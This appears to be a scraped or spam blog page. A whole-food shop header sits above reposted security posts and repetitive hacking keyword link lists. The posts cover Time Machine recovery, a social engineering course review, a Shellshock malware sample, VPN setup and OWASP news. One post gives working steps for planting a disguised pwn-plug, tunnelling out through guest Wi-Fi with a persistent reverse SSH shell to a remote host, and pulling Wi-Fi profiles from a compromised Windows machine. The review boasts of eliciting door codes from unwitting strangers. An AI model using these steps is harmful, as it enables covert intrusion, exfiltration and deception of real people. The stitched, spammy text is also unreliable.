Codex Alimentarius

Name:
Location: Winnipeg, Manitoba, Canada

The Wholefood Farmacy makes eating healthy easy, convenient and affordable. We offer pure, nutrient-dense, ready-to-eat, whole food meals, snacks, soups, smoothie mixes and treats for the children. All of our foods are vegetarian, most are raw and vegan as well. We also offer many gluten-free and nut-free whole food choices for those with food sensitivities - see our FAQ section of the Whole Food Farmacy Website for more information.

Friday, May 22, 2020

DeepEnd Research: Analysis Of Trump's Secret Server Story


 We posted our take on the Trump's server story. If you have any feedback or corrections, send me an email (see my blog profile on Contagio or DeepEnd Research)

Analysis of Trump's secret server story...



Related links

Thursday, May 21, 2020

SigPloit SS7 Tool

Continue reading


Recovering Data From An Old Encrypted Time Machine Backup

Recovering data from a backup should be an easy thing to do. At least this is what you expect. Yesterday I had a problem which should have been easy to solve, but it was not. I hope this blog post can help others who face the same problem.


The problem

1. I had an encrypted Time Machine backup which was not used for months
2. This backup was not on an official Apple Time Capsule or on a USB HDD, but on a WD MyCloud NAS
3. I needed files from this backup
4. After running out of time I only had SSH access to the macOS, no GUI

The struggle

By default, Time Machine is one of the best and easiest backup solution I have seen. As long as you stick to the default use case, where you have one active backup disk, life is pink and happy. But this was not my case.

As always, I started to Google what shall I do. One of the first options recommended that I add the backup disk to Time Machine, and it will automagically show the backup snapshots from the old backup. Instead of this, it did not show the old snapshots but started to create a new backup. Panic button has been pressed, backup canceled, back to Google.


Other tutorials recommend to click on the Time Machine icon and pressing alt (Option) key, where I can choose "Browse other backup disks". But this did not list the old Time Machine backup. It did list the backup when selecting disks in Time Machine preferences, but I already tried and failed that way.


YAT (yet another tutorial) recommended to SSH into the NAS, and browse the backup disk, as it is just a simple directory where I can see all the files. But all the files inside where just a bunch of nonsense, no real directory structure.

YAT (yet another tutorial) recommended that I can just easily browse the content of the backup from the Finder by double-clicking on the sparse bundle file. After clicking on it, I can see the disk image on the left part of the Finder, attached as a new disk.
Well, this is true, but because of some bug, when you connect to the Time Capsule, you don't see the sparse bundle file. And I got inconsistent results, for the WD NAS, double-clicking on the sparse bundle did nothing. For the Time Capsule, it did work.
At this point, I had to leave the location where the backup was present, and I only had remote SSH access. You know, if you can't solve a problem, let's complicate things by restrict yourself in solutions.

Finally, I tried to check out some data forensics blogs, and besides some expensive tools, I could find the solution.

The solution

Finally, a blog post provided the real solution - hdiutil.
The best part of hdiutil is that you can provide the read-only flag to it. This can be very awesome when it comes to forensics acquisition.


To mount any NAS via SMB:
mount_smbfs afp://<username>@<NAS_IP>/<Share_for_backup> /<mountpoint>

To mount a Time Capsule share via AFP:
mount_afp afp://any_username:password@<Time_Capsule_IP>/<Share_for_backup> /<mountpoint>

And finally this command should do the job:
hdiutil attach test.sparsebundle -readonly

It is nice that you can provide read-only parameter.

If the backup was encrypted and you don't want to provide the password in a password prompt, use the following:
printf '%s' 'CorrectHorseBatteryStaple' | hdiutil attach test.sparsebundle -stdinpass -readonly

Note: if you receive the error "resource temporarily unavailable", probably another machine is backing up to the device

And now, you can find your backup disk under /Volumes. Happy restoring!

Probably it would have been quicker to either enable the remote GUI, or to physically travel to the system and login locally, but that would spoil the fun.More information
  1. Sdr Hacking
  2. Curso Completo De Hacking Ético
  3. Aprender Hacking Desde Cero
  4. Definicion De Cracker
  5. Hacking Con Buscadores Pdf

Social Engineering Pentest Professional(SEPP) Training Review

Intro:
I recently returned from the new Social Engineering training provided by Social-Engineer.org in the beautiful city of Seattle,WA, a state known for sparkly vampires, music and coffee shop culture.  As many of you reading this article, i also read the authors definitive book Social Engineering- The art of human hacking and routinely perform SE engagements for my clients. When i heard that the author of the aforementioned book was providing training i immediately signed up to get an in person glance at the content provided in the book. However, i was pleasantly surprised to find the course covered so much more then what was presented in the book.

Instructors:



I wasn't aware that there would be more then one instructor and was extremely happy with the content provided by both instructors. Chris and Robin both have a vast amount of knowledge and experience in the realm of social engineering.  Each instructor brought a different angle and use case scenario to the course content. Robin is an FBI agent in charge of behavioral analysis and uses social engineering in his daily life and work to get the results needed to keep our country safe. Chris uses social engineering in his daily work to help keep his clients secure and provides all sorts of free learning material to the information security community through podcasts and online frameworks.



Course Material and Expectation: 
I originally thought that the material covered in class would be a live reiteration of the material covered in Chris's book. However, I couldn't have been more wrong !!  The whole first day was about reading yourself and other people, much of the material was what Robin uses to train FBI agents in eliciting information from possible terrorist threats. Each learning module was based on live demo's, nightly labs, and constant classroom interaction. Each module was in depth and the level of interaction between students was extremely useful and friendly. I would say the instructors had as much fun as the students learning and sharing social techniques and war stories.
The class was heavily made up of ways to elicit personal and confidential information in a way that left the individuatial "Happier for having met you".  Using language, body posture and social truisms as your weapon to gather information, not intended for your ears, but happily leaving the tongue of your target.
Other class activities and materials included an in depth look at micro expressions with labs and free extended learning material going beyond the allotted classroom days.  Also break out sessions which focused on creating Phone and Phishing scripts to effectively raise your rate of success. These sessions were invaluable at learning to use proper language techniques on the phone and in email to obtain your objectives.

Nightly Missions/Labs: 
If you think that you are going to relax at night with a beer. Think again!! You must ensure that your nights are free, as you will be going on missions to gain information from live targets at venues of your choice.  Each night you will have a partner and a mission to gain certain information while making that persons day better then it started.  The information  you are requested to obtain will change each night and if done properly you will notice all of the material in class starting to unfold.. When you get to body language training you will notice which targets are open and when its best to go in for the kill. You will see interactions change based on a persons change in posture and facial expressions. Each day you will take the new techniques you have learned and put them into practice. Each morning you have to report your findings to the class..
During my nightly labs i obtained information such as door codes to secured research facilities, information regarding secret yet to be released projects.  On the lighter side of things i obtained much personal information from my targets along with phone numbers and invitations for further hangouts and events. I made many new friends inside and outside of class.
There were also labs within the confines of the classroom such as games used to solidify your knowledge and tests to figure out what kind of learner you are. Technical labs on the use of information gathering tools and ways to use phone and phishing techniques to your advantage via linguistically and technologically. Essentially the class was about 60% interaction and labs.


Proof it works:
After class i immediately had a phishing and phone based contract at my current employment. I used the email and phone scripts that we created in class with 100% click rate and 100% success in phone elicitation techniques. Gaining full unfettered access to networks through phone and email elicitation and interaction. Although I do generally have a decent SE success rate, my rates on return are now much higher and an understanding of what works and what doesn't, and why are much more refined.


Conclusion and Certification:
I paid for this class out of pocket, including all expenses, hotels, rentals cars and planes etc etc. I would say that the class was worth every penny in which i paid for it. Many extras were given including black hat passes, extended training from notable sources and continued interaction from instructors after class ended. I would highly recommend this class to anyone looking for a solid foundation in social engineering or a non technical alternative to training.  You will learn a lot, push yourself in new ways and have a blast doing it. However I did not see any sparkly vampires while in seattle.... Twilight lied to me LOL
The certification is a 48 hour test in which you will utilize your knowledge gained technologically and socially to breach a company.I am not going to give away to much information about the certification as i haven't taken it yet and I do not want to misspeak on the subject. However I will say that social-engineer.org has done an excellent job at figuring out a way to include Real World Social Engineering into a test with verifiable proof of results. I am going to take my test in a couple weeks and it should be a blast!!!

Thanks and I hope this review is helpful to all those looking for SE training.  I had a blast :) :)

Related links


  1. Hacking Online Games
  2. Hacking Wifi Kali Linux
  3. Curso Hacking Gratis
  4. Life Hacking
  5. Como Aprender A Hackear
  6. Hacking Games
  7. Javascript Hacking
  8. Growth Hacking Definicion
  9. Hacking Python
  10. Hacking News

ShellShock Payload Sample Linux.Bashlet



Someone kindly shared their sample of the shellshock malware described by the Malware Must die group - you can read their analysis here:

File: fu4k_2485040231A35B7A465361FAF92A512D
Size: 152
MD5: 2485040231A35B7A465361FAF92A512


VIrustotal

SHA256: e74b2ed6b8b005d6c2eea4c761a2565cde9aab81d5005ed86f45ebf5089add81
File name: trzA114.tmp
Detection ratio: 22 / 55
Analysis date: 2014-10-02 05:12:29 UTC ( 6 hours, 50 minutes ago )
Antivirus Result Update
Ad-Aware Linux.Backdoor.H 20141002
Avast ELF:Shellshock-A [Expl] 20141002
Avira Linux/Small.152.A 20141002
BitDefender Linux.Backdoor.H 20141002
DrWeb Linux.BackDoor.Shellshock.2 20141002
ESET-NOD32 Linux/Agent.AB 20141002
Emsisoft Linux.Backdoor.H (B) 20141002
F-Secure Linux.Backdoor.H 20141001
Fortinet Linux/Small.CU!tr 20141002
GData Linux.Backdoor.H 20141002
Ikarus Backdoor.Linux.Small 20141002
K7AntiVirus Trojan ( 0001140e1 ) 20141001
K7GW Trojan ( 0001140e1 ) 20141001
Kaspersky Backdoor.Linux.Small.cu 20141001
MicroWorld-eScan Linux.Backdoor.H 20141002
Qihoo-360 Trojan.Generic 20141002
Sophos Linux/Bdoor-BGG 20141002
Symantec Linux.Bashlet 20141002
Tencent Win32.Trojan.Gen.Vdat 20141002
TrendMicro ELF_BASHLET.A 20141002
TrendMicro-HouseCall ELF_BASHLET.A 20141002
nProtect Linux.Backdoor.H 20141001

More info


Wednesday, May 20, 2020

Backchannel Data Exfiltration Via Guest/R&D Wi-Fi


Often times I find unprotected wireless access points with unfettered access to the internet for research or guest access purposes. This is generally through an unauthenticated portal or a direct cable connection. When questioning the business units they explain a low value network, which is simply a internet pass thru separate from the internal network. This sounds reasonable and almost plausible however I usually explain the dangers of having company assets on an unprotected Wi-Fi and the dangers of client side exploits and MITM attacks. But there are a few other plausible scenarios one should be aware of that may scare you a bit more then the former discussion.

What about using OpenWifi as a backchannel data exfiltration medium?

An open Wi-Fi is a perfect data exfiltration medium for attackers to completely bypass egress filtering issues, DLP, proxy filtering issues and a whole bunch of other protection mechanisms in place to keep attackers from sending out shells and moving data between networks. This can easily be accomplished via dual homing your attack host utilizing multiple nic cards which are standard on almost all modern machines. Whether this is from physical access breach or via remote compromise the results can be deadly. Below are a few scenarios, which can lead to undetectable data exfiltration.




Scenario 1: (PwnPlug/Linux host with Wi-Fi adaptor)
The first useful scenario is when a physical perimeter has been breached and a small device from http://pwnieexpress.com/ known as a pwn-plug is installed into the target network or a linux host with a wireless card. I usually install pwn-plug's inside a closet or under a desk somewhere which is not visible and allows a network connection out to an attacker owned host. Typically its a good idea to label the small device as "IT property and Do Not Remove". This will keep a casual user from removing the device. However if there is network egress and proxy filtering present then our network connection may never reach a remote host. At this point your physical breach to gain network access to an impenetrable network perimeter will fail. Unless there happens to be an open cable Wi-Fi connection to an "inconsequential R&D network".

By simply attaching an Alpha card to the pwnplug you can connect to the R&D wireless network. You can then use this network as your outgoing connection and avoid corporate restrictions regarding outbound connections via metasploit or ssh. I have noticed that most clients these days are running heavy egress filtering and packet level protocol detection, which stops outbound connections. Rather then play the obfuscation game i prefer to bypass the restrictions all together using networks which have escaped corporate policy.

You can automate the following via a script if you wardrive the facility prior to entrance and gain insight into the open wireless network, or you can also configure the plug via serial connection on site provided you have time.

Connect to wifi:
ifconfig wlan0 up
iwconfig wlan0 essid [targetNetworkSSID]
dhclient wlan0

Run a reverse SSH tunnel:
ssh -R 3000:127.0.0.1:22 root@remoteHost.com

On the remote host you can retrieve your shell:
ssh -p 3000 User@localhost

Once you have authenticated with the pwnplug via your local host port forward you now have access into the internal network via an encrypted tunnel which will not be detected and fully bypass any corporate security restrictions. You can take this a bit further and setup some persistence in case the shell goes down.. This can be done via bash and nohup if you setup some ssh keys to handle authentication.. One example could be the following script:

Your bash script: 
#---------------------
#!/bin/bash
while true
do
 ssh -R 3000:127.0.0.1:22 root@remoteHost.com
 sleep 10
done
#---------------------

Run this with nohup like this:
nohup ./shell.sh &


Another simple way would be to setup a cron job to run a script with your ssh command on a specified interval for example every 5 minutes like so:

Cron job for every 5 minutes: 
*/5 * * * * /shell.sh



Scenario 2: (Remote Windows Compromise)
The second scenario is that of a compromised modern windows machine with a wireless card, this can be used to make a wireless connection outbound similar to the first scenario which will bypass restrictions by accessing an unrestricted network. As shown in "Vista Power Tools" paper written by Josh Wright you can use modern windows machines cards via the command line.
http://www.inguardians.com/pubs/Vista_Wireless_Power_Tools-Wright.pdf

Below are the commands to profile the networks and export a current profile then import a new profile for your target wireless network. Then from there you can connect and use that network to bypass corp restrictions provided that wireless network doesn't have its own restrictions.

Profile Victim machine and extract a wireless profile: 
netsh wlan show interfaces
netsh wlan show networks mode=bssid
netsh wlan show profiles
netsh wlan export profile name="CorpNetwork"

Then modify that profile to meet the requirements needed for the R&D network and import it into the victim machine.

Upload a new profile and connect to the network: 
netsh wlan add profile filename="R&D.xml"
netsh wlan show profiles
netsh wlan connect name="R&D"

If you check out Josh's excellent paper linked above you will also find ways of bridging between ethernet and wireless adaptors along with lots of other ideas and useful information.

I just got thinking the other day of ways to abuse so called guest or R&D networks and started writing down a few ideas based on scenarios which play out time and time again while penetration testing networks and running physical breach attacks. I hear all to often that a cable connection not linked to the corporate network is totally safe and I call bullshit on that.

More articles


Tuesday, May 19, 2020

How To Install Windscribe - The Best Free VPN On GNU/Linux Distros?


Why should you use Windscrive?
   Windscribe is well-known for their free VPN service but they also have a paid version. Only with a free account, you will get 10 countries to connect through and change your real IP address and 10GB of free traffic (if you use an email to sign up Windscribe), and unlimited devices.

   The Free version is awesome, but the Pro one is even better! With Pro version you will get Unlimited DataUnblock over 60 Countries and 110 CitiesConfig Generator (OpenVPN, IKEv2, SOCKS5), and full protection from R.O.B.E.R.T.

   For your information, Windscribe is one of the best VPN services in the category Free AuditValue Audit and Overall Audit in BestVPN.com Awards 2019 (Read the White Paper here). You totally can believe in Windscribe (100% no logs).

   And about R.O.B.E.R.T, it's an advanced DNS level blocker that protects you from MalwareAds and TrackersSocial trackingPornGamblingFake NewsClickbait and Cryptominers. Read more about R.O.B.E.R.T.




Anyway, Windscribe helps you:
  • Stop tracking and browse privately: Governments block content based on your location. Corporations track and sell your personal data. Get Windscribe and take back control of your privacy.
  • Unblock geo-restricted content: Windscribe masks your IP address. This gives you unrestricted and private access to entertainment, news sites, and blocked content in over 45 different countries.
  • Take your browsing history to your grave: Protect your browsing history from your network administrator, ISP, or your mom. Windscribe doesn't keep any logs, so your private data stays with you.
  • Stop leaking personal information: Prevent hackers from stealing your data while you use public WIFI and block annoying advertisers from stalking you online.
  • Go beyond basic VPN protection: For comprehensive privacy protection, use our desktop and browser combo (they're both free).

   Windscribe also supports Chrome browser, Firefox browser, Opera browser, Smart TV, Routers, Android, iOS, BlackBerry, Windows OS, Mac OS X and GNU/Linux OS, you name it.

   You can install Windscribe on Ubuntu, Debian, Fedora, CentOS, Arch Linux and their based distros too.

   But to install and safely use Internet through Windscribe, you must sign up an account first. If you already have an account then let's get started.

How to install Windscribe on Arch and Arch-based distros?
   First, open your Terminal.

   For Arch Linux and Arch-based distro users, you can install Windscribe from AUR. Run these commands without root to download and install Windscribe on your Arch:


   For other distro users, go to VPN for Linux - Windscribe choose the binary file that compatible with your distro (.DEB for Debian and Ubuntu based, .RPM for Fedora and CentOS based) and then install it.
dpkg -i [Windscribe .DEB package]
rpm -ivh [Windscribe .RPM package]



   Or you can scroll down to Pick Your Distro, click to the distro version you use, or click to the distro version that your distro is based on and follow the instructions.

   Now enter these commands to auto-start a and log in to Windscribe.

   Enter your username and password and then you can enjoy Windscribe's free VPN service.

How to use Windscribe on Linux?
   This is Windscribe list of commands (windscribe --help):
   If you want Windscribe to chooses the best location for you, use windscribe connect best.

   But if you want to choose location yourself, here is the list of Windscribe's locations:
   *Pro only
   Example, i want to connect to "Los Angeles - Dogg", i use windscribe connect Dogg.

   If you want to stop connecting through Windscribe use windscribe disconnect.

   For some reasons, you want to log out Windscribe from your device, use windscribe logout.

I hope this article is helpful for you 😃


More info


  1. Experto En Seguridad Informática
  2. Hacking Social
  3. Hacking Life
  4. Hacking Videos
  5. Como Empezar En El Hacking
  6. Paginas De Hacking
  7. Experto En Seguridad Informática
  8. Como Empezar A Hackear
  9. Sean Ellis Hacking Growth
  10. Live Hacking

Monday, May 18, 2020

The OWASP Foundation Has Selected The Technical Writer For Google Season Of Docs

The OWASP Foundation has selected the technical writer for Google Season of Docs by Fabio Cerullo


The OWASP Foundation has been accepted as the organization for the Google Seasons of Docs, a project whose goals are to give technical writers an opportunity to gain experience in contributing to open source projects and to give open-source projects an opportunity to engage the technical writing community.

During the program, technical writers spend a few months working closely with an open-source community. They bring their technical writing expertise to the project's documentation, and at the same time learn about open source and new technologies.

The open-source projects work with the technical writers to improve the project's documentation and processes. Together they may choose to build a new documentation set, or redesign the existing docs, or improve and document the open-source community's contribution procedures and onboarding experience. Together, we raise public awareness of open source docs, of technical writing, and of how we can work together to the benefit of the global open source community.

After a careful review and selection process, the OWASP Foundation has picked the primary technical writer who will work along the OWASP ZAP Team for the next 3 months to create the API documentation of this flagship project.

Congratulations to Nirojan Selvanathan!

Please refer to the linked document where you could look at the deliverables and work execution plan.



More articles

  1. Hacking Google Home Mini
  2. Growth Hacking Marketing
  3. Growth Hacking Cursos
  4. Curso Growth Hacking
  5. Growth Hacking Tools
  6. Curso Growth Hacking
  7. Penetration Testing A Hands-On Introduction To Hacking

OWASP May Connector 2019

OWASP
Connector
May 2019

COMMUNICATIONS


Letter from the Vice Chairman:

Dear OWASP Community,

Since last month the foundation has been busy working towards enabling our project leaders and community members to utilize funds to work on nurturing and developing projects. So far there has been huge uptake on this initiative. It's great to see so many people passionate about collaborating at project summits. 
 
Our Global AppSec Tel-Aviv is nearly upon us, for members, there is an extra incentive for attending this conference, in the form of a significant discount. This and the sandy beaches and beautiful scenery, not to mention the great speakers and trainers we have lined up, is a great reason to attend. If you have not done so we would encourage you to attend this great conference - https://telaviv.appsecglobal.org.
 
One of the key things I've noticed in my Board of Director tenure is the passion our community emits, sometimes this passion aids in growing the foundation, but sometimes it also forces us to take a step back and look at how we do things within the foundation. With Mike, our ED and staff we have seen a lot of good change from an operations perspective, with more in the pipeline. Mike's appointment has allowed the Board of Directors to take a step back from operations and enable us to work on more strategic goals. To this end at a recent Board meeting we discussed each Board member taking up one of the following strategic goals, as set out at the start of the year:
 
1.Marketing the OWASP brand 
2.Membership benefits
3.Developer outreach

  • Improve benefits 
  • Decrease the possibility of OWASP losing relevance
  • Reaching out to management and Risk levels
  • Increase involvement in new tech/ ways of doing things – dev ops
 
4.Project focus 
  • Get Universities involved
  • Practicum sponsored ideas
  • Internships 

 
5.Improve finances
6.Improve OWAP/ Board of Directors Perception
7.Process improvement
8. Get consistent ED
9.Community empowerment
 
I would encourage the community to come forward if you have any ideas on the above and are happy to work with one of the 7 Board of Directors and community members on one of these initiatives. 
 
Thanks and best wishes, 
Owen Pendlebury
Vice Chair

OWASP FOUNDATION UPDATE FROM INTERIM EXECUTIVE DIRECTOR:

OWASP Foundation welcomes aboard Emily Berman as Events Director. Emily was most recently with the Scrum Alliance where she planned high-profile functions for upwards of 2,000 guests. Emily brings a fresh approach to events planning and her 12 years of experience planning and organizing large-scale events worldwide well in advance will greatly benefit our Global AppSecs.
Did you Register yet? 
Global AppSec DC September 9-13, 2019
submit to the Call for Papers and Call for Training
Check out Sponsorship Opportunities while they are still available.
Save the Date for Global AppSec Amsterdam Sept 23-27, 2019 
Sponsorship Opportunities are available

EVENTS 

You may also be interested in one of our other affiliated events:

REGIONAL AND LOCAL EVENTS

Event DateLocation
Latam Tour 2019 Starting April 4, 2019 Latin America
OWASP Portland Training Day September 25, 2019 Portland, OR
OWASP Italy Day Udine 2019 September 27,2019 Udine, Italy
OWASP Portland Day October 16,2019 Wroclaw, Poland
LASCON X October 24-25,2019 Austin, TX
OWASP AppSec Day 2019 Oct 30 - Nov 1, 2019 Melbourne, Australia

PARTNER AND PROMOTIONAL EVENTS
Event Date Location
Open Security Summit June 3-7,2019 Woburn Forest Center Parcs, Bedfordshire
Hack in Paris 2019 June 16-20, 2019 Paris
Cyber Security and Cloud Expo Europe June 19-20, 2019 Amsterdam
IoT Tech Expo Europe June 19-20, 2019 Amsterdam
BlackHat USA 2019 August 3-8,2019 Las Vegas, Nevada
DefCon 27 August 8-11,2019 Las Vegas, Nevada
it-sa-IT Security Expo and Congress October 8-10, 2019 Germany

PROJECTS

We have had the following projects added to the OWASP inventory.  Please congratulate these leaders and check out the work they have done:

Project Type Leader(s)
Risk Assessment Framework Documentation Ade Yoseman Putra, Rejah Rehim
QRLJacker Tool Mohammed Baset
Container Security Verification Standard Documentation Sven Vetsch
Find Security Bugs Code Philippe Arteau
Vulnerable Web Application Code Fatih Çelik
D4N155 Tool Julio Pedro de Lira Neto
Jupiter Tool Matt Stanchek
Top 10 Card Game Documentation Dennis Johnson
Samurai WTF Code Kevin Johnson
DevSecOps Maturity Model Documentation Timo Pagel

 


Also, we will have the following projects presenting at the Project Showcase Global AppSec Tel Aviv:

Final Schedule
Wednesday, May 29th Thursday, May 30th
Time Project Presenter(s) Confirmed Time Project Presenter(s) Confirmed
10:​4​5 a.m. Glue Tool Omer Levi Hevroni Yes 10:​30 ​ a.m. API Security Erez Yalon, Inon Shkedy Yes
  ​7    
               
11:5​5​ a.m. IoT & Embedded AppSec Aaron Guzman Yes 11:​50​ a.m. Mod Security Core Rule Set Tin Zaw Yes
        12:​25 ​p.m. Automated Threats Tin Zaw Yes
12:​30 ​p.m. Lunch Break   12:​55​ p.m. Lunch Break  
2:​35​ p.m. SAMM John DiLeo Yes        
​3:10​ p.m. Application Security Curriculum John DiLeo Yes ​3:10 p.m. ​Damned Vulnerable Serveless Application​ ​Tal Melamed​ ​Yes​
 

Finally, if you are able to help participate in the Project Reviews at the Conference, please send me an email at harold.blankenship@owasp.com.  We have a large line-up of projects to review this time around:

Project To Level Leader(s)
Snakes and Ladders Flagship Katy Anton, Colin Watson
Cheat Sheet Series Flagship Dominique Righetto, Jim Manico
Mobile Security Testing Guide Flagship Jeroen Willemsen, Sven Schleier
Amass Lab Jeff Foley
Attack Surface Detector Lab Ken Prole
SecureTea Lab Ade Yoseman Putra, Bambang Rahmadi K.P, Rejah Rehim.A.A
Serverless Goat Lab Ory Segal

Google Summer of Code Update:
We were allocated 13 students this year!  The current timeline is as follows:
Google Season of Docs:
We were accepted into the Google Season of Docs.  There will be a single technical writer resource.  The current timeline is as follows:

COMMUNITY

New OWASP Chapters
Riyadh, Saudi Arabia
Guayaquil, Equador
Lome, Togo
Natal, Brazil
Nashua, New Hampshire
Gwalior, India
Louisville, Kentucky
Nainital, India
Liverpool, United Kingdom
Syracuse, New York

MEMBERSHIP

 
We would like to welcome the following Premier and Contributor Corporate Members.

Premier Corporate Members

Contributor Corporate Members
Join us
Donate
Our mailing address is:
OWASP Foundation 
1200-C Agora Drive, # 232
Bel Air, MD 21014  
Contact Us
Unsubscribe






This email was sent to *|EMAIL|*
why did I get this?    unsubscribe from this list    update subscription preferences
*|LIST:ADDRESSLINE|*